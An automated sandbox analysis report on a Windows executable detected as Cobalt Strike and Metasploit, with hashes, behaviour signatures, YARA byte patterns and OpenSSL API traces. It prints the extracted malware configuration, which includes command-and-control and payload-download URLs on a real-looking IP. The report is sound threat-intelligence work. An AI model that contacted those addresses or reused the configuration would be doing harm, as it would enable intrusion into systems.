Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DChOtFdp9T.exe

Overview

General Information

Sample name:DChOtFdp9T.exe
renamed because original name is a hash value
Original sample name:8ee41e146f682cfed19648f1ccb68bfa.exe
Analysis ID:1582596
MD5:8ee41e146f682cfed19648f1ccb68bfa
SHA1:a49dc5ca5ac1cd8311a04804aed8d57c572974a2
SHA256:bf1b7e92893315f4c17394356ff7418fb6ef80a8cfc8e43d7905e8f2230fb77e
Tags:CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected Python Injector
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found pyInstaller with non standard icon
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DChOtFdp9T.exe (PID: 5640 cmdline: "C:\Users\user\Desktop\DChOtFdp9T.exe" MD5: 8EE41E146F682CFED19648F1CCB68BFA)
    • DChOtFdp9T.exe (PID: 4020 cmdline: "C:\Users\user\Desktop\DChOtFdp9T.exe" MD5: 8EE41E146F682CFED19648F1CCB68BFA)
      • WerFault.exe (PID: 6760 cmdline: C:\Windows\system32\WerFault.exe -u -p 4020 -s 1316 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://01.42.238.250:443/Ye3l", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n", "Type": "Metasploit Download", "URL": "http://101.42.238.250/Ye3l"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x13985:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x139f1:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x22d01:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x22d6d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        Click to see the 8 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://01.42.238.250:443/Ye3l", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n"}
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n", "Type": "Metasploit Download", "URL": "http://101.42.238.250/Ye3l"}
        Multi AV Scanner detection for submitted file
        Source: DChOtFdp9T.exeVirustotal: Detection: 63%Perma Link
        Source: DChOtFdp9T.exeReversingLabs: Detection: 44%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,1_2_00007FFDFF241B18
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24DFB5 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF24DFB5
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241019 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF241019
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2423EC CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF2423EC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF266030 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,d2i_X509,X509_get0_pubkey,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF266030
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24202C CRYPTO_free,1_2_00007FFDFF24202C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242720 CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF242720
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24150F OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,1_2_00007FFDFF24150F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2425DB CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,1_2_00007FFDFF2425DB
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF243EB0 CRYPTO_free,1_2_00007FFDFF243EB0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24107D CRYPTO_free,1_2_00007FFDFF24107D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF245EE0 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,1_2_00007FFDFF245EE0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242680 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF242680
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2ADF40 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,1_2_00007FFDFF2ADF40
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25BF30 CRYPTO_memcmp,1_2_00007FFDFF25BF30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A3F30 ERR_new,ERR_set_debug,X509_get0_pubkey,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes_ex,EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,1_2_00007FFDFF2A3F30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241C53 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFF241C53
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF255F20 CRYPTO_THREAD_run_once,1_2_00007FFDFF255F20
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241D89 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF241D89
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF265E10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF265E10
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24108C ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFF24108C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242310 ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,1_2_00007FFDFF242310
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2ABE20 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2ABE20
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF245C9B CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,1_2_00007FFDFF245C9B
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2423F1 CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2423F1
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF253CC0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFF253CC0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF255CB0 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,1_2_00007FFDFF255CB0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242595 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFF242595
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF265D20 CRYPTO_free,CRYPTO_free,1_2_00007FFDFF265D20
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241CEE CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,1_2_00007FFDFF241CEE
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A3D20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFF2A3D20
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF263D28 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_set_ex_data,CRYPTO_set_ex_data,CRYPTO_get_ex_data,1_2_00007FFDFF263D28
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF265B90 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF265B90
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2BBB70 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,OPENSSL_sk_num,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,1_2_00007FFDFF2BBB70
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF255BB0 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,1_2_00007FFDFF255BB0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF26DBA0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFF26DBA0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A1B9F CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFF2A1B9F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241582 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFF241582
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24155A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFF24155A
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241483 CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF241483
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2419E7 CRYPTO_free,1_2_00007FFDFF2419E7
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF257A60 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,1_2_00007FFDFF257A60
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A3A60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFF2A3A60
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF289A60 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFF289A60
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28FB00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFF28FB00
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF26FAF0 CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,1_2_00007FFDFF26FAF0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFDFF24105F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28D980 RAND_bytes_ex,CRYPTO_malloc,memset,1_2_00007FFDFF28D980
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF291970 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,1_2_00007FFDFF291970
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2411DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFF2411DB
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241A15 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFF241A15
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF283A00 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF283A00
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF241A41
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2ABA20 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2ABA20
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24589C BIO_get_data,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,1_2_00007FFDFF24589C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF259870 CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF259870
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2413DE EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2413DE
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2738C0 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2738C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24F910 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,1_2_00007FFDFF24F910
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2BB900 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2BB900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241654 EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_PKEY_get_id,ERR_new,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,EVP_DigestVerify,ERR_new,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,1_2_00007FFDFF241654
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241E6A ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFDFF241E6A
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2411BD CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2411BD
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2977A0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2977A0
